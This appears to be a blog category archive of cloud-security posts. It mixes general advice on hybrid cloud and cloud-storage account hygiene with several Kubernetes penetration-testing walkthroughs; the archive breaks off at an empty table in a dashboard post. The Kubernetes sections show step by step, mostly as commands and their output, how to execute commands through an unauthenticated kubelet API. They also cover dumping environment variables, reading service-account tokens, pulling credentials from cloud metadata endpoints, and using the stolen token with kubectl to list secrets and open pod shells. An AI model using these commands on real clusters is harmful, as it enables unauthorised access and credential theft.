Category Archives: cloud

Succeed in Your Cloud Migration With a Secure Hybrid Cloud Strategy

Picture this: An object storage misconfiguration has left thousands of customer records fully exposed. Your company is about to face costly compliance consequences and a loss of customer trust. How should you respond? More importantly, how could a secure hybrid cloud strategy have helped prevent such an incident from happening in the first place?

As IT teams face significant pressure to develop a successful cloud migration strategy, many organizations treat security as an afterthought in their rush to move to the cloud. Today, 81 percent of organizations have a multicloud strategy, according to RightScale. Migration without cloud security services for visibility and governance can significantly increase the complexity, costs and risks of adoption.


When Unsecure Cloud Migration Becomes Disastrous

Too often, security is forgotten in the excitement to capture the hybrid cloud's remarkable potential. Perceptions that secure processes slow digital transformation may lead to security being treated as an afterthought. While effectively managed cloud adoption can improve data security and disaster recovery, many organizations are wary of public cloud providers' shared responsibility models with third-party security providers, which can add complexity for users and complicate access and compliance governance compared to on-premises deployments. A Cybersecurity Insiders survey found that 43 percent of cloud adopters lack visibility into infrastructure security, 38 percent report compliance troubles and 35 percent struggle to consistently enforce security policies.

Learn more about how to secure your hybrid cloud

Misconfigured cloud servers and other improperly configured systems were solely responsible for the exposure of 2 billion data records tracked by IBM X-Force researchers last year. In addition, inadvertent insider error has contributed to a more than 400 percent year-over-year growth in cloud security risks, due in large part to misunderstandings about shared responsibility models for protecting data in the cloud. Ultimately, if a data breach or disruption occurs, the organization is liable for the loss of customer trust, regulatory fines and other expensive consequences.

By rushing cloud adoption, businesses are more likely to generate risks than gain a competitive advantage. In fact, 74 percent of organizations reported that they likely experienced a data breach in the past year due to a lack of secure cloud migration processes. Secure cloud design, a full understanding of responsibility models and solutions for proactive risk management are critical to realizing cloud benefits.

How to Adopt Hybrid Cloud With Confidence

The organization’s ability to develop a successful cloud migration strategy depends, in part, on the IT team’s ability to effectively manage competing priorities of speed, cost efficiency and security. Across industries, hybrid cloud adoption is a necessary tool to balance expanding workloads and data assets. As cloud threats increase, managing hybrid cloud infrastructures requires the enterprise to develop new processes and adopt new solutions for visibility and control.

Strive for True Hybrid Cloud Visibility

Hybrid cloud environments can host a wide array of resources and application programming interfaces (APIs), which can make it challenging to orchestrate effective security controls.

The need for visibility necessitates management solutions designed to capture a diverse view of storage, networking and provisioning activities across public and private cloud environments. Cloud security services should offer visibility and analytics to proactively manage compliance, identify threats and accelerate remediation activities.

Proactively Manage the Cloud Life Cycle

Effective data governance in a hybrid cloud infrastructure requires comprehensive security policies that are proactively and consistently implemented across apps, services, databases, users and endpoints. Cloud security tools should support the organization’s transition to a DevSecOps model where security works alongside DevOps so that proper security controls are built into the design process from the beginning. In turn, this simplifies the process of access management, authentication and authorization in native and migrated cloud apps. To manage threats and compliance risks, organizations need solutions that automate policy enforcement and strengthen compliance posture in a hybrid cloud environment post-deployment.

Why the Enterprise Is Responsible for Protecting Customer Trust in the Hybrid Cloud

The revolution toward a digital economy is underway, and organizations recognize the potential of the hybrid cloud to introduce agility and scale. As IT teams face pressure to deploy a hybrid cloud infrastructure that supports digital transformation activities, many are rushing to the cloud without a comprehensive approach to protecting critical data by design and default.

To fully realize the potential benefits of the secure hybrid cloud, organizations must understand that the responsibility for protecting customer data and ensuring a secure move to the cloud continues to rest with them and their IT teams. Implementing secure processes during migration and adoption can reduce the costs and risks that result from treating security as an afterthought. Cloud security services for visibility and orchestration are a necessity to proactively manage policy, compliance and access across cloud apps and services.

Learn more about how to secure your hybrid cloud

The post Succeed in Your Cloud Migration With a Secure Hybrid Cloud Strategy appeared first on Security Intelligence.

What is Amazon GovCloud?

Amazon GovCloud is an isolated Amazon Web Services (AWS) region designed to allow customers and U.S. government agencies to move their confidential data into the cloud to address compliance and specific regulatory requirements. It runs under ITAR, the U.S. International Traffic in Arms Regulations. With this cloud service, U.S. citizens can run workloads that […]… Read More

The post What is Amazon GovCloud? appeared first on The State of Security.

Kubernetes: Kube-Hunter 10255

Below is some sample output, mainly here to show what an open 10255 will give you and what it looks like. What is probably of most interest is the /pods endpoint




or the /metrics endpoint



or the /stats endpoint
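
If you want to poke at these yourself, the read-only kubelet port speaks plain HTTP, so requests along these lines will pull the same data (the IP is a placeholder):

$ curl -s http://1.2.3.4:10255/pods | python -mjson.tool
$ curl -s http://1.2.3.4:10255/metrics
$ curl -s http://1.2.3.4:10255/stats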




$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint

----------

Nodes
+-------------+---------------+
| TYPE        | LOCATION      |
+-------------+---------------+
| Node/Master | 1.2.3.4       |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE              | LOCATION            | DESCRIPTION          |
+----------------------+---------------------+----------------------+
| Kubelet API          | 1.2.3.4:10255       | The read-only port   |
| (readonly)           |                     | on the kubelet       |
|                      |                     | serves health        |
|                      |                     | probing endpoints,   |
|                      |                     | and is relied upon   |
|                      |                     | by many kubernetes   |
|                      |                     | componenets          |
+----------------------+---------------------+----------------------+
| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    |
|                      |                     | stores cluster's     |
|                      |                     | data, it contains    |
|                      |                     | configuration and    |
|                      |                     | current state        |
|                      |                     | information, and     |
|                      |                     | might contain        |
|                      |                     | secrets              |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:6443        | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:443         | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {"etcdserver":"2.3.8 |
|                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 |
|                     |                      | connection (HTTP)    | authorization and    | ...                  |
|                     |                      |                      | authentication), it  |                      |
|                     |                      |                      | would allow a        |                      |
|                     |                      |                      | potential attacker   |                      |
|                     |                      |                      | to                   |                      |
|                     |                      |                      |      gain access to  |                      |
|                     |                      |                      | the etcd             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 |
|                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 |
|                     |                      |                      | give an attacker a   | ...                  |
|                     |                      |                      | valuable data to     |                      |
|                     |                      |                      | attack a cluster     |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          |
|                     | Disclosure           | Disclosure           | version could be     |                      |
|                     |                      |                      | obtained from logs   |                      |
|                     |                      |                      | in the /metrics      |                      |
|                     |                      |                      | endpoint             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            |
|                     | Disclosure           |                      | view sensitive       |                      |
|                     |                      |                      | information about    |                      |
|                     |                      |                      | pods that are bound  |                      |
|                     |                      |                      | to a Node using the  |                      |
|                     |                      |                      | /pods endpoint       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           |
|                     | Disclosure           | Disclosure           | open /healthz        |                      |
|                     |                      |                      | handler, an attacker |                      |
|                     |                      |                      | could get the        |                      |
|                     |                      |                      | cluster health state |                      |
|                     |                      |                      | without              |                      |
|                     |                      |                      | authenticating       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod |
|                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node |
|                     |                      |                      | attacker cluster's   | ...                  |
|                     |                      |                      | possible exploits,   |                      |
|                     |                      |                      | secrets and more.    |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  |
|                     |                      |                      | container exist on a | 1fmd9-z9685,         |
|                     |                      |                      | node. could expose   | containe...          |
|                     |                      |                      | the node/cluster to  |                      |
|                     |                      |                      | unwanted root        |                      |
|                     |                      |                      | operations           |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+

Kubernetes: unauth kubelet API 10250 token theft & kubectl

Kubernetes: unauthenticated kubelet API (10250) token theft & kubectl access & exec


kube-hunter output to get us started:

Do a curl -ks https://k8-node:10250/runningpods/ to get a list of running pods.

With that data, you can craft your POST request to exec within a pod and poke around.

 Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kubelet tokens are in the environment variables. Depending on the cloud provider or hosting provider, they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata URL (see the sketch right after this list)
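
As a sketch of option 2: on GKE, the node's service account token can usually be pulled from the metadata service from inside the pod (run the request through the same /run exec trick); on AWS the equivalent lives under the IAM security-credentials path. Exact paths vary by provider:

curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/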

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.


We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:

KUBERNETES_PORT=tcp://10.10.10.10:443

or

KUBERNETES_MASTER_NAME: 10.11.12.13:443

Once we get the Kubernetes tokens or keys, we need to talk to the API server to use them. The kubelet (10250) won't know what to do with them. The API server may be (if we are lucky) another public IP or a 10.x.x.x IP. If it's a 10.x.x.x IP, we need to download kubectl to the pod.

Assuming the tokens are not in the environment variables, let's look and see if they are in the mounted secrets:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"

sample output truncated:
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.crt, namespace, and token:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"

Output:

total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:

NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y 
kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120d

At this point you can pull secrets or exec into any available pods.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

To get a shell via kubectl:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system

NAME                                                            READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness, if you got the keys via the environment variables, the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces


Kubernetes: unauth kubelet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port, but it's still possible to expose it inadvertently, and it's still pretty common to find it exposed via the "insecure API service" option.


Everybody who has access to the kubelet service port (10250), even without a certificate, can execute any command inside the container.

# /run/%namespace%/%pod_name%/%container_name%

example:

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

total 12
drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
drwxr-xr-x    5 root     root            41 Aug 26 11:31 var


Here is how to get all the secrets a container uses (environment variables - it's common to see kubelet tokens here):

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system//" -d "cmd=env"

The list of all pods and containers that were scheduled on the Kubernetes worker node can be retrieved using the command below:

$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

or

$ curl --insecure  https://k8s-node-1:10250/runningpods | jq


Example 1:

curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)

Example 2:
curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Unauthorized

Example 3:

curl --insecure  https://1.2.3.4:10250/runningpods | jq


Output:

{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "kube-dns-5b8bf6c4f4-k5n2g",
        "generateName": "kube-dns-5b8bf6c4f4-",
        "namespace": "kube-system",
        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",
        "uid": "63438841-e43c-11e8-a104-42010a80038e",
        "resourceVersion": "85366060",
        "creationTimestamp": "2018-11-09T16:27:44Z",
        "labels": {
          "k8s-app": "kube-dns",
          "pod-template-hash": "1646927090"
        },
        "annotations": {
          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",
          "kubernetes.io/config.source": "api",
          "scheduler.alpha.kubernetes.io/critical-pod": ""
        },
        "ownerReferences": [
          {
            "apiVersion": "extensions/v1beta1",
            "kind": "ReplicaSet",
            "name": "kube-dns-5b8bf6c4f4",
            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",
            "controller": true
          }
        ]
      },
      "spec": {
        "volumes": [
          {
            "name": "kube-dns-config",
            "configMap": {
              "name": "kube-dns",
              "defaultMode": 420
            }
          },
          {
            "name": "kube-dns-token-xznw5",
            "secret": {
              "secretName": "kube-dns-token-xznw5",
              "defaultMode": 420
            }
          }
        ],
        "containers": [
          {
            "name": "dnsmasq",
            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
            "args": [
              "-v=2",
              "-logtostderr",
              "-configDir=/etc/k8s/dns/dnsmasq-nanny",
              "-restartDnsmasq=true",
              "--",
              "-k",
              "--cache-size=1000",
              "--no-negcache",
              "--log-facility=-",
              "--server=/cluster.local/127.0.0.1#10053",
              "--server=/in-addr.arpa/127.0.0.1#10053",
              "--server=/ip6.arpa/127.0.0.1#10053"
            ],
            "ports": [
              {
                "name": "dns",
                "containerPort": 53,
                "protocol": "UDP"
              },
              {
                "name": "dns-tcp",
                "containerPort": 53,
                "protocol": "TCP"
              }
            ],
            "resources": {
              "requests": {
                "cpu": "150m",
                "memory": "20Mi"
              }
            },
            "volumeMounts": [
              {
                "name": "kube-dns-config",
                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"
              },
              {
                "name": "kube-dns-token-xznw5",
                "readOnly": true,
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"
              }
            ],
            "livenessProbe": {
              "httpGet": {
                "path": "/healthcheck/dnsmasq",
                "port": 10054,
                "scheme": "HTTP"
              },
              "initialDelaySeconds": 60,
              "timeoutSeconds": 5,
              "periodSeconds": 10,
              "successThreshold": 1,
              "failureThreshold": 5
            },
            "terminationMessagePath": "/dev/termination-log",
            "imagePullPolicy": "IfNotPresent"
          },
        --------SNIP---------

With the output of the runningpods command, you can craft your command to do the code exec:

$ curl -k -XPOST "https://k8s-node-1:10250/run///" -d "cmd=env"

as an example:



leaves you with:

curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"

total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  125 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Nov  9 16:27 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Kubernetes: List of ports

Other Kubernetes ports


What are some of the visible ports used in Kubernetes?

  • 44134/tcp - Helm Tiller, Weave, Calico
  • 10250/tcp - kubelet (kubelet exploit)
    • No authN, completely open
    • /pods
    • /runningpods
    • /containerLogs
  • 10255/tcp - kubelet read-only port
    • /stats
    • /metrics
    • /pods
  • 4194/tcp - cAdvisor
  • 2379/tcp - etcd (see it on other ports though)
    • Etcd holds all the configs
    • Config storage
  • 30000 - dashboard
  • 443/6443 - api
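
A quick way to sweep a host for these ports with nmap might look like this (a sketch; the target IP is a placeholder):

$ nmap -sT -Pn -p 443,2379,4194,6443,10250,10255,30000,44134 1.2.3.4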

How to secure your cloud file storage with 5 simple tricks

File hosting / cloud storage services today are a dime a dozen. Players in this vertical constantly top each other with free storage offerings, business features, and custom plans, all designed to cater to every possible audience. But they all have one thing in common: the cloud.

Cloud storage is somewhat of a double-edged sword: it’s a convenient way to keep your entire fleet of devices in sync, but it can also spell disaster if someone finds the keys to your vault. Remember the celebrity nudes leak a few years ago? Yeah. You don’t want that ‘fappening’ to you. So it’s a good idea to remind ourselves that cloud storage services like iCloud, Dropbox and Google Drive are not impenetrable. Your vendor can only do so much to protect you. ‘The Fappening’ was mostly the result of those celebrities falling victim to phishing emails. So it’s important to enable extra safeguards to avoid falling victim to scams that steal your password. In this guide, we’ll look at five practices to secure your cloud content and keep your digital life away from prying eyes.

Step 1 – Verify your email and/or phone number

This may draw a resounding “d’oooh” from power users, but you’d be surprised how many people forget their login credentials, especially those who aren’t online 24/7. Checking and confirming your email address with your vendor also helps you recover a forgotten password, so consider this simple step a double-whammy. Most cloud services also let you change the email associated with your account so, if you want to start anew, look for the module that lets you tweak this setting. It’s typically located under “account settings” or “security.”

Dropbox offers the option to quickly change the email associated with your account

If you have a phone number associated with your account, verify that one as well, and remember to update it if you end up changing your number for any reason. It ensures you’re always reachable on another device for two-factor authentication, important notifications that may involve security matters, and other exceptional situations.

Step 2 – Review, add, or remove devices, browsers and linked apps

Most cloud services offer a handy list of all devices linked to your account. If you’re a longtime user, chances are you’ve swapped devices a few times over the years. So, don’t be surprised if the list names a Windows Vista machine, or your old BlackBerry Bold. While vendors do their best to monitor your account for suspicious activity, it’s a good idea to unlink any old devices you no longer use. The same goes for different web browsers associated with your account, or linked apps that integrate with the service. If you no longer use those apps, there’s no reason for your account to keep ties with them. Who’s to say they don’t suffer a breach one day and leak your credentials?

Devices associated with a Google Drive account
This is how iCloud displays your devices. Simply click on the device's name for more options to manage it, including disassociating one or more devices from your account (for example, if you've sold your phone to someone).
An example of linked apps in Dropbox

Step 3 – enable two-factor-authentication (2FA)

Two-factor-authentication, typically abbreviated as 2FA, adds another layer of security to your online accounts. It allows the service to verify that the person logging in is really you by asking you to confirm a code on another device that you own. Wonder when this comes in handy? The 2014 iCloud hack could have been almost entirely avoided had those celebs used 2FA.

So be sure to flip this switch on for every online service you have an account with, especially your cloud storage services. Most vendors today offer this option, and some even have it on by default. But for those services that don’t have 2FA enabled from the start, be sure to dig through the settings and turn it on. It’s a life saver!

iCloud asks to check your phone for a six-digit passcode

Step 4 – have good password hygiene

Yes, it’s a drag, but you should still do it. Data breaches are so common these days that it’s become a matter of when, not if, one of your online accounts gets compromised. And cloud accounts are easily the most sensitive ones. It’s also wise to use a strong password when you decide to change it. Use a combination of upper- and lower-case letters, numbers, as well as special characters (#$%*). And remember, eight characters is the absolute minimum by today’s standards.

If you don’t trust your memory with such a complex string of characters, perhaps it’s time you considered using a password manager. There’s no shortage of options out there. Plus, it’s advisable to use different passwords with different online accounts, in case your credentials end up for sale on the dark web following a breach.

Microsoft even offers a way to go password-less with its OneDrive file-hosting service. All you need to do is download the Authenticator app for iOS or Android. “It’s more convenient and more secure,” according to the software giant. OneDrive users can also tick a box and have Microsoft remind them to change their password once every 72 days.

Changing a password in OneDrive. Microsoft offers tips on how to set a strong password, as well as the option to get nagged from time to time to change it.

Step 5 – Always sign out!

The exclamation mark above is easily justified. ALWAYS sign out of your account when you access your file storage service in a web browser, especially on an external device. For instance, Dropbox stays logged in forever, even after you close the tab in your browser – a big oversight on the part of a service with more than 500 million users. Nevertheless, end users shoulder the responsibility of keeping their accounts secure. If someone else has access to your computer, whether at home or at work, they can easily peek into your private life with a few keystrokes and clicks. Maybe you have nothing to hide, but why would you want someone peeking at your photos without you knowing? So remember to always hit that "sign out" button when you're done.

Stay safe

These are just a few simple tricks to help you keep your digital life safe. We could mention other things as well, like choosing security questions and answers that can’t be easily guessed (for password recovery), or keeping an eye out for phishing scams that impersonate your cloud vendor. But as a rule of thumb, these five tips are all you need to stay on the safe side.

The folks at Apple prefer to keep iCloud users away from the technicalities and randomly trigger two-factor authentication every now and then to verify that no one has hijacked your account. They even show you how to avoid phishing emails and other scams so you don't mistakenly give someone the keys to your iCloud. Dropbox has a comprehensive security checkup module that lets you do most of the above in one shot. And Google and Microsoft offer handy "Authenticator" apps with their respective services (Google Drive and OneDrive).

While businesses may be reluctant to store their intellectual property on remote servers, public clouds are nonetheless a decent option for regular users. So go ahead and apply these five tricks to your preferred cloud storage app or service. You’ll be glad you did. Stay safe out there!

Kubernetes: Kubernetes Dashboard


Tesla was famously hacked for leaving this open, and it's pretty rare to find it exposed externally now, but it's useful to know what it is and what you can do with it.

Usually found on port 30000

kube-hunter finding for it:

Vulnerabilities
+-----------------------+---------------+----------------------+----------------------+------------------+
| LOCATION              | CATEGORY      | VULNERABILITY        | DESCRIPTION          | EVIDENCE         |
+-----------------------+---------------+----------------------+----------------------+------------------+
